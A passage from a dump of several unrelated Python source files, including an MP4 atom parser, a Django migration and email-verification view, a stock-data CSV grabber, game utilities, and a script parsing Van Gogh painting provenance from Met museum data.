in rmAtomList:\n atomList.remove(atom)\n\ndef PrintLeafAtomInfo(lvl, atomInfo):\n for propr in atomInfo:\n print(lvl*g_printLvlTab + propr[0] + ': ' + propr[1])\n\ndef ReadLeafAtomInfo(f, atom):\n tag = atom[0]\n\n f.seek(atom[1], os.SEEK_SET)\n dataLen = atom[2] - atom[1]\n data = f.read(dataLen)\n if len(data) < dataLen:\n return []\n\n info = []\n if IsKnownAtom(atom) and tags[tag][1]:\n data = ReadAtomExtFromBuf(info, data)\n\n if tag == 'ftyp':\n ReadFtypInfo(info, data)\n elif tag == 'mvhd':\n ReadMvhdInfo(info, data)\n elif tag == 'tkhd':\n ReadTkhdInfo(info, data)\n elif tag == 'mdhd':\n ReadMdhdInfo(info, data)\n elif tag == 'hdlr':\n ReadHdlrInfo(info, data)\n elif tag == 'vmhd':\n ReadVmhdInfo(info, data)\n elif tag == 'smhd':\n ReadSmhdInfo(info, data)\n elif tag == 'hmhd':\n ReadHmhdInfo(info, data)\n elif tag == 'dref':\n ReadDrefInfo(info, data)\n elif tag == 'stts':\n ReadSttsInfo(info, data)\n elif tag == 'ctts':\n ReadCttsInfo(info, data)\n elif tag == 'stsd':\n ReadStsdInfo(info, data)\n elif tag == 'stsz':\n ReadStszInfo(info, data)\n elif tag == 'stz2':\n ReadStz2Info(info, data)\n elif tag == 'stsc':\n ReadStscInfo(info, data)\n elif tag == 'stco':\n ReadStcoInfo(info, data)\n elif tag == 'co64':\n ReadCo64Info(info, data)\n elif tag == 'stss':\n ReadStssInfo(info, data)\n\n return info\n\ndef ReadAtomExtFromBuf(info, data):\n if len(data) < 4:\n return data\n\n info.append(['version', str(struct.unpack('B', data[0])[0])])\n info.append(['flags', HexStr(data[1:4])])\n\n return data[4:]\n\ndef ReadFtypInfo(info, data):\n if len(data) < 8:\n return\n\n info.append(['major brand', data[:4]])\n info.append(['minor version', str(struct.unpack('>I', data[4:8])[0])])\n \n compatBrands = ''\n idx = 8\n while (idx + 4) <= len(data):\n compatBrands += data[idx:idx+4]\n idx += 4\n\n info.append(['compatible brands', compatBrands])\n\ndef HexStr(data):\n hexStr = ''\n for c in data:\n hexStr += '{:0>2x} '.format(ord(c))\n\n return hexStr\n\ndef TimeStr(time):\n year = 1904\n dayLength = 24 * 3600\n\n while True:\n if (year % 4) == 0:\n yearLength = 366 * dayLength\n else:\n yearLength = 365 * dayLength\n\n if time < yearLength:\n break\n\n time -= yearLength\n year += 1\n\n\n months = [['jan', 31], ['feb', 28], ['mar' , 31,], ['apr' , 30,], ['may' , 31,], ['jun' , 30,], ['jul' , 31,], ['aug' , 31,], ['sep' , 30,], ['oct' , 31,], ['nov' , 30,], ['dec' , 31]]\n \n day = 1\n idx = 0\n while True:\n [month, daysInMonth] = months[idx]\n if ((year % 4) == 0) and (month == 'feb'):\n daysInMonth += 1\n\n if time < dayLength:\n break\n\n day += 1 \n time -= dayLength\n\n if day > daysInMonth:\n day -= daysInMonth\n idx += 1\n\n hourLength = 3600\n hour = int(time / hourLength)\n time = time % hourLength\n\n minLen = 60\n minute = int(time / minLen)\n time = time % minLen\n\n sec = time\n\n return '{0}:{1}:{2} {3}/{4}/{5}'.format(hour, minute, sec, day, month, year)\n\ndef TimescaleStr(timescale):\n if timescale == 1:\n return '1 s'\n else:\n return '1/' + str(timescale) + ' s'\n\ndef MatHex(mat):\n if len(mat) < 36:\n return ''\n\n idx = 0\n matList = []\n for i in range(9):\n x = mat[idx : idx+4]\n idx += 4\n matList.append(HexStr(x))\n\n return ', '.join(matList)\n\ndef ReadMvhdInfo(info, data):\n if info[0][1] == '1':\n fmt = '>QQIQ'\n else:\n fmt = '>IIII'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, timescale, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['timescale', TimescaleStr(timescale)])\n info.append(['duration', str(duration)])\n\n rate = data[dataLen:dataLen+4]\n if len(rate) < 4:\n return\n info.append(['rate', HexStr(rate)])\n dataLen += 4\n\n volume = data[dataLen: dataLen+2]\n if len(volume) < 2:\n return\n info.append(['volume', HexStr(volume)])\n dataLen += 12\n\n matrix = data[dataLen: dataLen + 36]\n if len(matrix) < 36:\n return\n info.append(['matrix', MatHex(matrix)])\n dataLen += 60\n\n buf = data[dataLen: dataLen+4]\n if len(buf) < 4:\n return\n nextTrackID = str(struct.unpack('>I', buf)[0])\n info.append(['next track ID', nextTrackID])\n\ndef ReadTkhdInfo(info, data):\n if info[0][1] == '1':\n fmt = '>QQI4xQ'\n else:\n fmt = '>III4xI'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, trackID, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['track ID', str(trackID)])\n info.append(['duration', str(duration)])\n\n dataLen += 8\n\n layer = data[dataLen:dataLen + 2]\n if len(layer) < 2:\n return\n info.append(['layer', str(struct.unpack('>h', layer)[0])])\n dataLen += 2\n\n alternateGroup = data[dataLen:dataLen + 2]\n if len(alternateGroup) < 2:\n return\n info.append(['alternate group', str(struct.unpack('>h', alternateGroup)[0])])\n dataLen += 2\n\n volume = data[dataLen:dataLen + 2]\n if len(volume) < 2:\n return\n info.append(['volume', str(struct.unpack('>h', volume)[0])])\n dataLen += 2\n\n matrix = data[dataLen:dataLen + 36]\n if len(matrix) < 36:\n return\n info.append(['matrix', MatHex(matrix)])\n dataLen += 36\n\n width = data[dataLen:dataLen + 4]\n if len(width) < 4:\n return\n info.append(['width', str(struct.unpack('>I', width)[0])])\n dataLen += 4\n\n height = data[dataLen:dataLen + 4]\n if len(height) < 4:\n return\n info.append(['height', str(struct.unpack('>I', height)[0])])\n \ndef LangStr(lang):\n langStr = ''\n for i in range(3):\n langStr = chr((lang & 0x1f) + 0x60) + langStr\n lang = lang >> 5\n return langStr\n\ndef ReadMdhdInfo(info, data):\n if info[0][1] == '1':\n fmt = '>QQIQ'\n else:\n fmt = '>IIII'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, timescale, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['timescale', TimescaleStr(timescale)])\n info.append(['duration', str(duration)])\n\n language = data[dataLen:dataLen+2]\n if len(language) < 2:\n return\n info.append(['language', LangStr(struct.unpack('>H', language)[0])])\n\ndef ReadHdlrInfo(info, data):\n global g_trackType\n\n dataLen = 4\n handlerType = data[dataLen: dataLen+4]\n if len(handlerType) < 4:\n return\n info.append(['handler type', handlerType])\n g_trackType = handlerType\n dataLen += 16\n\n name = data[dataLen:]\n info.append(['name', name])\n\ndef ReadVmhdInfo(info, data):\n dataLen = 0\n\n graphicsMode = data[dataLen: dataLen+2]\n if len(graphicsMode) < 2:\n return\n info.append(['graphics mode', str(struct.unpack('>H', graphicsMode)[0])])\n dataLen += 2\n\n opColor = data[dataLen: dataLen+6]\n if len(opColor) < 6:\n return\n op1, op2, op3 = struct.unpack('>HHH', opColor)\n info.append(['opcolor', str(op1) + ' , ' + str(op2) + ' , ' + str(op3)])\n\ndef ReadSmhdInfo(info, data):\n balance = data[:2]\n if len(balance) < 2:\n return\n\n left, right = struct.unpack('BB', balance)\n info.append(['balance', '{0}.{1}'.format(left, right)])\n\ndef ReadHmhdInfo(info, data):\n return\n\ndef ReadDrefInfo(info, data):\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n atom = ReadAtomFromBuf(data, idx, len(data))\n if atom == None:\n return\n info.append([atom[0], '']) \n buf = ReadAtomExtFromBuf(info, data[atom[1]:atom[2]])\n if atom[0] == 'url ':\n location = buf\n info.append(['location', location])\n elif atom[0] == 'urn ':\n [name, location] = buf.split('\\00')\n info.append(['name', name])\n info.append(['location', name])\n else:\n pass\n\n idx = atom[2]\n\ndef ReadSttsInfo(info, data):\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n buf = data[idx:idx+8]\n if len(buf) < 8:\n return\n idx += 8\n sampleCount, sampleDelta = struct.unpack('>II', buf)\n info.append(['sample count', str(sampleCount)])\n info.append(['sample delta', str(sampleDelta)])\n\ndef ReadCttsInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n idx += 4\n\n sampleCountLst = []\n sampleDeltaLst = []\n for i in range(min(g_listLimit, entryCount)):\n buf = data[idx:idx+8]\n if len(buf) < 8:\n return\n idx += 8\n \n sampleCount, sampleDelta = struct.unpack('>II', buf)\n sampleCountLst.append('{0: >4}'.format(sampleCount))\n sampleDeltaLst.append('{0: >4}'.format(sampleDelta))\n\n info.append(['sample count', ' '.join(sampleCountLst)])\n info.append(['sample offset', ' '.join(sampleDeltaLst)])\n\ndef ReadStsdInfo(info, data):\n global g_trackType\n\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n atom = ReadAtomFromBuf(data, idx, len(data))\n if atom == None:\n return\n info.append([atom[0], ''])\n\n idx = atom[1] + 6\n buf = data[idx:idx+2]\n if len(buf) < 2:\n return\n dataReferenceIndex = struct.unpack('>H', buf)[0]\n info.append(['data reference index', str(dataReferenceIndex)])\n idx += 2\n\n\n if g_trackType == 'soun':\n ParseAudioSampleEntry(info, data[idx:atom[2]])\n elif g_trackType == 'vide':\n ParseVideoSampleEntry(info, data[idx:atom[2]])\n elif g_trackType == 'hint':\n ParseHintSampleEntry(info, data[idx:atom[2]])\n else:\n return\n\n g_trackType = None\n\n idx = atom[2]\n\ndef ParseAudioSampleEntry(info, data):\n idx = 8\n\n channelCount = data[idx:idx+2]\n if len(channelCount) < 2:\n return\n info.append(['channel count', str(struct.unpack('>H', channelCount)[0])])\n idx += 2\n\n sampleSize = data[idx:idx+2]\n if len(sampleSize) < 2:\n return\n info.append(['sample size', str(struct.unpack('>H', sampleSize)[0])])\n idx += 6\n\n sampleRate = data[idx:idx+4]\n if len(sampleRate) < 4:\n return\n info.append(['sample rate', str(struct.unpack('>I', sampleRate)[0])])\n\ndef ParseVideoSampleEntry(info, data):\n idx = 16\n width = data[idx:idx+2]\n if len(width) < 2:\n return\n info.append(['width', str(struct.unpack('>H', width)[0])])\n idx += 2\n\n height = data[idx:idx+2]\n if len(height) < 2:\n return\n info.append(['height', str(struct.unpack('>H', height)[0])])\n idx += 2\n\n hRes = data[idx:idx+4]\n if len(hRes) < 4:\n return\n info.append(['horizontal resolution', HexStr(hRes)])\n idx += 4\n\n vRes = data[idx:idx+4]\n if len(vRes) < 4:\n return\n info.append(['vertical resolution', HexStr(vRes)])\n idx += 8\n\n frameCount = data[idx:idx+2]\n if len(frameCount) < 2:\n return\n info.append(['frame count', str(struct.unpack('>H', frameCount)[0])])\n idx += 2\n\n compressorName = data[idx:idx+32]\n if len(compressorName) < 32:\n return\n info.append(['compressor name', compressorName])\n idx += 32\n\n depth = data[idx:idx+2]\n if len(depth) < 2:\n return\n info.append(['depth', HexStr(depth)])\n\ndef ParseHintSampleEntry(info, data):\n pass\n\ndef ReadStszInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleSize = struct.unpack('>I', buf)[0]\n idx += 4\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleCount = struct.unpack('>I', buf)[0]\n info.append(['sample count', str(sampleCount)])\n idx += 4\n\n if sampleSize != 0:\n info.append(['sample size', str(sampleSize)])\n return\n\n sampleSizes = []\n for i in range(min(g_listLimit, sampleCount)):\n entrySize = data[idx:idx+4]\n if len(entrySize) < 4:\n return\n sampleSizes.append(str(struct.unpack('>I', entrySize)[0]))\n idx += 4\n info.append(['sample sizes', ','.join(sampleSizes)])\n\ndef ReadStz2Info(info, data):\n pass\n\ndef ReadStscInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n firstChunkLst = []\n samplesPerChunkLst = []\n sampleDescriptionIndexLst = []\n for i in range(min(g_listLimit, entryCount)):\n buf = data[idx:idx+12]\n if len(buf) < 12:\n return\n firstChunk, samplesPerChunk, sampleDescriptionIndex = struct.unpack('>III', buf)\n\n firstChunkLst.append('{0: >5}'.format(firstChunk))\n samplesPerChunkLst.append('{0: >5}'.format(samplesPerChunk))\n sampleDescriptionIndexLst.append('{0: >5}'.format(sampleDescriptionIndex))\n\n idx += 12\n\n info.append(['first chunk ', ' '.join(firstChunkLst)])\n info.append(['samples per chunk ', ' '.join(samplesPerChunkLst)])\n info.append(['sample description index list', ' '.join(sampleDescriptionIndexLst)])\n\ndef ReadStcoInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n chunkOffsetLst = []\n for i in range(min(entryCount, g_listLimit)):\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n chunkOffset = struct.unpack('>I', buf)[0]\n chunkOffsetLst.append('{0: >5}'.format(chunkOffset))\n idx += 4\n\n info.append(['chunk offset', ' '.join(chunkOffsetLst)])\n\ndef ReadCo64Info(info, data):\n pass\n\ndef ReadStssInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n sampleNumberLst = []\n for i in range(min(entryCount, g_listLimit)):\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleNumber = struct.unpack('>I', buf)[0]\n sampleNumberLst.append('{0: >5}'.format(sampleNumber))\n idx += 4\n\n info.append(['sample number', ' '.join(sampleNumberLst)])","sub_path":"iso.py","file_name":"iso.py","file_ext":"py","file_size_in_byte":23489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"145011356","text":"from bit_string_generator import BitStringGenerator\n\n\ndef brute_force(long_string_len, short_string_len):\n result_dict = {''.join(str(y)\n for y in x): 0 for x in BitStringGenerator(short_string_len)}\n for long_list in BitStringGenerator(long_string_len):\n long_string = ''.join(str(x) for x in long_list)\n for short_list in BitStringGenerator(short_string_len):\n short_string = ''.join(str(x) for x in short_list)\n if short_string in long_string:\n result_dict[short_string] = result_dict[short_string]+1\n\n # print(result_dict)\n return result_dict\n","sub_path":"brute_force_solution.py","file_name":"brute_force_solution.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"31071281","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('camo', '0094_auto_20160225_2205'),\n ('panel', '0016_auto_20160302_0948'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PilotAircraft',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('aircraft', models.ForeignKey(verbose_name='Statek powietrzny', to='camo.Aircraft')),\n ('pilot', models.ForeignKey(verbose_name='Pilot', to='panel.Pilot')),\n ],\n ),\n migrations.CreateModel(\n name='PilotFlightType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('flight_type', models.CharField(verbose_name='Rodzaj lotu', max_length=3)),\n ('pilot', models.ForeignKey(verbose_name='Pilot', to='panel.Pilot')),\n ],\n ),\n migrations.AlterField(\n model_name='operation',\n name='fuel_source',\n field=models.CharField(verbose_name='Źródło paliwa', default='unknown', max_length=10),\n ),\n ]\n","sub_path":"panel/migrations/0017_auto_20160305_1203.py","file_name":"0017_auto_20160305_1203.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81201120","text":"import requests\nimport csv\n\n#get data from JSON\n\ncode = 'BBY'\nmain_api = ('https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=' +\n code + '&apikey=XXXXXXXXXXXXXXXXXX')\nurl = main_api + urllib.parse.urlencode({'NYSE': code})\n\njson_data = requests.get(url).json()\n\ndata = []\n\nfor key,value in json_data['Time Series (Daily)'].items():\n date = key\n sopen = value[\"1. open\"]\n high = value[\"2. high\"]\n low = value[\"3. low\"]\n close = value[\"4. close\"]\n volume = value[\"5. volume\"]\n data.append(date) \n data.append(sopen) \n data.append(high) \n data.append(low) \n data.append(close)\n data.append(volume)\n#divide list of data into groups of five each containing the values above\ndef divide_chunks(n): \n for i in range(0, len(data), n): \n yield data[i:i + n] \n \nchunks = list(divide_chunks(6))\nchunks.pop(-1)\n\nwith open('C:\\\\python_work\\\\BBY-stockdata.csv', mode='w') as stockdata:\n stockdatacsv = csv.writer(stockdata, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n i = 0\n while i <= len(chunks):\n try:\n print(chunks[i])\n i+= 1\n stockdatacsv.writerow(chunks[i])\n except IndexError:\n print(\"Done!\")\n break\n stockdata.close()\n\n\n\n","sub_path":"grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241169626","text":"from gamecore import *\r\n\r\ncolor_dictionary = { # Diccionario que asocia los colores de alias con los de terminal\r\n \"azul\" : fg.blue,\r\n \"rojo\" : fg.red,\r\n \"verde\" : fg.green,\r\n \"amarillo\" : fg.yellow\r\n}\r\n\r\ndef get_color(card_color): # Funcion para devolver un color de terminal a partir de un alias\r\n return color_dictionary.get(card_color)\r\n\r\ndef get_choice(possible_choices): # Esta es una funcion para obtener respuestas del jugador\r\n count = 0\r\n for choice in possible_choices:\r\n print(f\"[{count}] {choice}\")\r\n count += 1\r\n while True:\r\n try:\r\n choice = int(input(\"Opcion > \"))\r\n selected_choice = possible_choices[choice]\r\n return selected_choice\r\n except ValueError:\r\n raise_error(\"Debes seleccionar un numero validos\")\r\n except IndexError:\r\n raise_error(\"Debes seleccionar una opcion valida\")\r\n","sub_path":"gamecore/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"204059343","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport smtplib\nimport email.mime.multipart\nimport email.mime.text\nfrom django.http import HttpResponseRedirect\nimport random\nfrom user.models import Userinfo\nfrom django.shortcuts import render\n\n\ndef generate_verification_code():\n code_list = []\n for i in range(2):\n random_num = random.randint(0, 9)\n a = random.randint(65, 90)\n b = random.randint(97, 122)\n random_uppercase_letter = chr(a)\n random_lowercase_letter = chr(b)\n code_list.append(str(random_num))\n code_list.append(random_uppercase_letter)\n code_list.append(random_lowercase_letter)\n verification_code = ''.join(code_list)\n return verification_code\n\n\ndef sendmail(request):\n if request.method == \"POST\":\n useremail = request.POST.get(\"useremail\").strip()\n\n try:\n result = Userinfo.objects.get(useremail=useremail)\n if result:\n msg = email.mime.multipart.MIMEMultipart()\n msg['from'] = 'test@test.com'\n msg['to'] = useremail\n msg['subject'] = 'Verification Code'\n content = 'verification code: ' + str(generate_verification_code())\n txt = email.mime.text.MIMEText(content)\n msg.attach(txt)\n smtp = smtplib.SMTP()\n smtp.connect('smtp.exmail.qq.com', '25')\n smtp.login('test@test.com', 'test123')\n smtp.sendmail('test@test.com', useremail, str(msg))\n smtp.quit()\n filename = useremail.split('@')[0]\n filepath = \"/data/AdminLTE/user/verification_code/\" + filename\n with open(filepath, 'w') as f:\n f.write(content)\n return render(request, \"modify-password.html\", {\"useremail\": useremail})\n except Userinfo.DoesNotExist:\n content = \"此邮箱未注册,请重新输入!\"\n return render(request, \"forget-password.html\", {\"content\": content})\n else:\n return HttpResponseRedirect(\"/login\")\n","sub_path":"AdminLTE/user/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326610378","text":"import pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport os\ndir = os.path.dirname(__file__)\nimport io\n\nimport requests\nimport googlemaps\n\nimport time\nstart_time = time.time()\n\nimport datetime\nnow = datetime.datetime.now()\n\nfrom geotext import GeoText\n\nimport urllib.request as req\n\nimport re\n\nimport json\n\n\n\"\"\"\n# def get_image(row):\n# return row['image_url'].split('/')[-1]\n# vanGoghProvenance['image'] = vanGoghProvenance.apply(get_image, axis=1)\n\n# Save images into assets folder\n# for x in vanGoghProvenance.index.values:\n# imageURL = vanGoghProvenance.iloc[x]['image_url']\n# image = vanGoghProvenance.iloc[x]['image']\n# imageFilePath = os.path.join(dir,'assets','images',image)\n# # print(imageFilePath)\n# req.urlretrieve(imageURL,imageFilePath)\n\n# Create thumbnails of these images one by one using Image Magick on terminal\n# http://www.imagemagick.org/Usage/thumbnails/#cut\n# convert -define jpeg:size=500x500 DT1567.jpg -thumbnail 500x500^ -gravity center -extent 500x500 ../thumbnails/DT1567.jpg\n\"\"\"\n\n# metObjectsUrl = 'https://media.githubusercontent.com/media/metmuseum/openaccess/master/MetObjects.csv'\n# metObjectsContent = requests.get(metObjectsUrl).content\n# metObjectsFull = pd.read_csv(io.StringIO(metObjectsContent.decode('utf-8')))\n\nvanGoghProvenanceJSON = os.path.join(dir,'assets','metObjectsVanGogh.json')\nvanGoghProvenance = pd.read_json(vanGoghProvenanceJSON)\n# vanGoghProvenance = vanGoghProvenance[['image_url','object_number','provenance','exhibitionHistory','image']]\nprovenanceList = []\nexhibitionHistoryList = []\nfor index in vanGoghProvenance.index.values:\n\n ### PROVENANCE ###\n objectNumber = vanGoghProvenance['object_number'][index]\n prov = vanGoghProvenance['provenance'][index]\n prov = prov.replace('[MMA 1995.535]','') ## brackets delineate line break from one owner to another, so this causes an issue in https://metmuseum.org/art/collection/search/437998\n prov = prov.replace('[','(')\n prov = prov.replace(']',')')\n\n if objectNumber == 459123:\n splitProvList = prov.split(';')\n else:\n splitProvList = prov.split(');')\n\n\n for p in range(len(splitProvList)):\n pid = str(objectNumber) + '_' + str(p)\n provItem = splitProvList[p]\n provItem = provItem.strip() # remove leading and trailing spaces\n provItem = provItem.replace(' (',', ')\n provItem = provItem.replace('(','')\n provItem = provItem.replace(',000','000') # remove commas in things that may be dollar amounts, which will screw up my splitting later on\n if (objectNumber == 437980 and p == 5):\n provItem = provItem.replace('bought in Paris;','bought in Paris')\n provItemMain = provItem.split(';')[1]\n else :\n provItemMain = provItem.split(';')[0]\n provItemMainSplit = provItemMain.split(',')\n\n ## if there are three items in the first chunk of each provenance, it is usually organized as owner, location, year\n if len(provItemMainSplit) == 3 :\n\n ## Fringe Cases where the below doesn't work ##\n if (objectNumber == 436536 and p == 8):\n provOwner = 'Wildenstein'\n provLocation = 'London'\n provYear = '1943'\n elif (objectNumber == 459123 and p < 5) : #rows 2,3,and 4 for 459123 are wonky. I will need to make a guess for the year on one.\n if (p==2):\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].strip().replace(')','')\n provYear = provItemMainSplit[2].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n elif (p==3):\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[2].strip()\n provYear = int(1910) #this is a guess splitting up the this owner and the next equally\n elif (p==4):\n provOwner = provItemMainSplit[0].strip() + ', ' + provItemMainSplit[1].strip().replace(')','')\n provLocation = provItemMainSplit[2].strip()\n provYear = int(1935) #this is a guess based on when her husband died\n\n\n else :\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].strip()\n provYear = provItemMainSplit[2].strip()\n\n provLocation = provLocation.split(' and')[0]\n provLocation = provLocation.split('/')[0]\n\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n\n ## more than three is a little weirder\n elif len(provItemMainSplit) > 3 :\n\n provItemMain = provItem.split(';')[0]\n ## Fringe Cases where the below doesn't work ##\n if ((objectNumber == 436528 and p == 1) or (objectNumber == 436534 and p == 1)) :\n provOwner = \"the estate of the artist's mother, Anna van gogh-Carbentus\"\n provLocation = 'Leiden'\n provYear = '1908'\n elif (objectNumber == 459123 and p == 1):\n provOwner = provItemMainSplit[1].strip()\n provLocation = provItemMainSplit[2].strip().split(')')[0]\n provYear = int(provItemMainSplit[len(provItemMainSplit)-1].strip())\n\n else :\n ## let's guess that the last bit of string is the year ###\n ## that didn't work for 459123 - https://metmuseum.org/art/collection/search/459123\n if objectNumber==459123:\n if p==0:\n provYear = 1888\n else:\n provYear = provItemMainSplit[len(provItemMainSplit)-1].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n else:\n provYear = provItemMainSplit[len(provItemMainSplit)-1].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n\n ### let's guess that the first bit of the string is the owner ###\n provOwner = provItemMainSplit[0].strip()\n\n ### now let's go through the remaining bits, see which one has cities text, and pull that text (along with country if possible)\n for a in range(1,len(provItemMainSplit)-1):\n provItemMainSplit[a] = provItemMainSplit[a].replace('Asnières','Paris') #suburb of Paris not being picked up\n provItemMainSplit[a] = provItemMainSplit[a].replace('Marie Julien','Arles') #this is for the first row of 459123 - data quality issue?\n\n ## go through each row and if we pull a valid city (NOT anna from Van Gogh's mom), then atttribute that city as location\n if ((len(GeoText(provItemMainSplit[a]).cities) > 0) and (provItemMainSplit[a].strip() != 'Anna van Gogh-Carbentus')):\n try:\n if len(GeoText(provItemMainSplit[a+1]).countries) > 0:\n provLocation = provItemMainSplit[a].strip() + ' ' + provItemMainSplit[a+1].strip()\n else:\n provLocation = provItemMainSplit[a].strip()\n except ValueError:\n provLocation = provItemMainSplit[a].strip()\n break\n else :\n provOwner += ', ' + provItemMainSplit[a].strip()\n\n ## less than three might not have all the info we need, so we'll look at context from other rows to see what's missing\n ### there are 13 instances of these across the 18 pieces for Van Gogh\n # y: ||||||||\n # o:\n # l: |||| (436535,436535)\n\n # so, none are missing the owner, most are missing year, and around half as many are missing location\n else :\n ## if we're missing year, then we will pull the last date from the previous year\n ### that means the next person will take ownership of the painting when the previous owner gave it up\n if re.sub('\\D','', provItemMainSplit[1]) == '':\n if (objectNumber in ([436525,436526,436531])):\n provYear = re.sub('\\D','', splitProvList[p-1])[-4:]\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].split('and')[0].strip()\n else:\n pass\n\n ## we know the year, but don't have the location in this data point\n else :\n provOwner = provItemMainSplit[0].strip()\n provYear = re.sub('\\D','', provItemMainSplit[1])[:4]\n if (provOwner == 'Wildenstein') : # https://metmuseum.org/art/collection/search/436536\n provLocation = 'London'\n elif (provOwner == 'A. Stoll') : # it's a guess = https://metmuseum.org/art/collection/search/436536\n provLocation = 'London'\n elif (objectNumber==436533 and p==0) :\n provLocation = 'Arles' # https://metmuseum.org/art/collection/search/436533\n elif (objectNumber==436535 and p==2) :\n provLocation = 'Paris' # kind of a guess based on rows before and after\n elif (objectNumber==437998 and p==9) :\n provLocation = 'Switzerland'\n else:\n pass\n\n provenanceList.append({\n 'pid': pid\n ,'object_number':int(objectNumber)\n ,'year': provYear\n ,'location': provLocation\n ,'owner': provOwner\n })\n\n ## add item if we know when it was transferred to MMA\n if (p==len(splitProvList)-1):\n if objectNumber not in ([459123]):\n mmaOwner = 'Metropolitan Museum of Art'\n mmaLocation = 'Metropolitan Museum of Art'\n mmaProvItem = provItem.replace('; on loan to MMA, 1936','on loan to MMA')\n if re.sub('\\D','', mmaProvItem.split(';')[-1]) == '':\n mmaYearDec = re.sub('\\D','', mmaProvItem.split(';')[-2])[-2:]\n else :\n mmaYearDec = re.sub('\\D','', mmaProvItem.split(';')[-1])[-2:]\n if int(mmaYearDec) < 20:\n mmaYearCen = 20\n else :\n mmaYearCen = 19\n mmaYear = int(str(mmaYearCen) + str(mmaYearDec))\n provenanceList.append({\n 'pid':str(objectNumber)+'_999'\n ,'object_number':int(objectNumber)\n ,'year':mmaYear\n ,'location':mmaLocation\n ,'owner':mmaOwner\n })\n\n\n\n ### EXHIBITION HISTORY ###\n if vanGoghProvenance['exhibitionHistory'][index] is not None:\n vanGoghProvenance['exhibitionHistory'][index] = vanGoghProvenance['exhibitionHistory'][index].replace('

THIS WORK MAY NOT BE LENT, BY TERMS OF ITS ACQUISITION BY THE METROPOLITAN MUSEUM OF ART.

','')\n vanGoghProvenance['exhibitionHistory'][index] = vanGoghProvenance['exhibitionHistory'][index].replace('St.','St')\n objectNumber = vanGoghProvenance['object_number'][index]\n exhibitionHistory = vanGoghProvenance['exhibitionHistory'][index]\n exhibitionHistory = vanGoghProvenance['exhibitionHistory'][index].split('

